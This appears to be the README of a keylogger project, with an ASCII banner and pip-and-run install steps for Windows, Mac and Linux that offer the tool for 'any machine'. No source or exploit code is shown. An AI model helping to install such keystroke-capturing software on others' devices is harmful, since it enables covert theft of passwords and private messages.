 /$$   /$$                     /$$                                                  
| $$  /$$/                    | $$                                                  
| $$ /$$/   /$$$$$$  /$$   /$$| $$  /$$$$$$   /$$$$$$   /$$$$$$   /$$$$$$   /$$$$$$ 
| $$$$$/   /$$__  $$| $$  | $$| $$ /$$__  $$ /$$__  $$ /$$__  $$ /$$__  $$ /$$__  $$
| $$  $$  | $$$$$$$$| $$  | $$| $$| $$  \ $$| $$  \ $$| $$  \ $$| $$$$$$$$| $$  \__/
| $$\  $$ | $$_____/| $$  | $$| $$| $$  | $$| $$  | $$| $$  | $$| $$_____/| $$      
| $$ \  $$|  $$$$$$$|  $$$$$$$| $$|  $$$$$$/|  $$$$$$$|  $$$$$$$|  $$$$$$$| $$      
|__/  \__/ \_______/ \____  $$|__/ \______/  \____  $$ \____  $$ \_______/|__/      
                     /$$  | $$               /$$  \ $$ /$$  \ $$                    
                    |  $$$$$$/              |  $$$$$$/|  $$$$$$/                    
                     \______/                \______/  \______/ 

------------------------------------------------------------------------------------------------------------------------

To Install This keylogger on any machine on any device except android please follow the instructions below:

------------------------------------------------------------------------------------------------------------------------

For Windows :

 Press Win+r
 Type "cmd"
 Then Type "pip3 install -r requirements.txt"
 Finally Type "python3 keylogger.py"
 
 -----------------------------------------------------------------------------------------------------------------------
 
 For Mac And Linux :
 
 Open Terminal
 Type "sudo pip3 install -r requirements.txt"
 Finally Type "python3 keylogger.py"
 
 -----------------------------------------------------------------------------------------------------------------------